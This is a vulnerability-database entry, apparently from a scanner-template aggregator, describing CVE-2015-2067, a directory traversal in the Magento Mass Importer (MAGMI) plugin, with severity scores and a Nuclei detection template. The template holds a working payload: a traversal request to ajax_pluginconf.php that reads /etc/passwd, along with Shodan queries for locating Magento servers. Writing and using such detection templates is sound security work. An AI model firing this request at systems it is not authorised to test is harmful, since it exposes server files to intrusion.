Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2015-2067
HistoryOct 11, 2021 - 11:24 a.m.

Magento Server MAGMI - Directory Traversal

2021-10-1111:24:36
ProjectDiscovery
github.com
18
cve2015
plugin
edb
packetstorm
lfi
magento
magmi_project
magento_server

CVSS2

5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

AI Score

6.3

Confidence

Low

EPSS

0.007

Percentile

80.5%

Magento Server MAGMI (aka Magento Mass Importer) contains a directory traversal vulnerability in web/ajax_pluginconf.php. that allows remote attackers to read arbitrary files via a … (dot dot) in the file parameter.

id: CVE-2015-2067

info:
  name: Magento Server MAGMI - Directory Traversal
  author: daffainfo
  severity: medium
  description: Magento Server MAGMI (aka Magento Mass Importer) contains a directory traversal vulnerability in web/ajax_pluginconf.php. that allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter.
  impact: |
    An attacker can exploit this vulnerability to read arbitrary files on the server.
  remediation: |
    Apply the latest security patches and updates provided by Magento.
  reference:
    - https://www.exploit-db.com/exploits/35996
    - https://nvd.nist.gov/vuln/detail/CVE-2015-2067
    - http://packetstormsecurity.com/files/130250/Magento-Server-MAGMI-Cross-Site-Scripting-Local-File-Inclusion.html
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N
    cvss-score: 5
    cve-id: CVE-2015-2067
    cwe-id: CWE-22
    epss-score: 0.00709
    epss-percentile: 0.79991
    cpe: cpe:2.3:a:magmi_project:magmi:-:*:*:*:*:magento_server:*:*
  metadata:
    max-request: 1
    vendor: magmi_project
    product: magmi
    framework: magento_server
    shodan-query:
      - http.component:"Magento"
      - http.component:"magento"
  tags: cve2015,cve,plugin,edb,packetstorm,lfi,magento,magmi,magmi_project,magento_server

http:
  - method: GET
    path:
      - "{{BaseURL}}/magmi/web/ajax_pluginconf.php?file=../../../../../../../../../../../etc/passwd&plugintype=utilities&pluginclass=CustomSQLUtility"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 4a0a0047304502201353ea7187a1f9c29751699fff1087525bba47f580ba3dd00f1b2452ed2e3979022100f18f15490a5ff61402b95bd4b23f40ae41ac30e76bae6c49bdb4a63b3159806a:922c64590222798bb761d5b6d8e72950

CVSS2

5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

AI Score

6.3

Confidence

Low

EPSS

0.007

Percentile

80.5%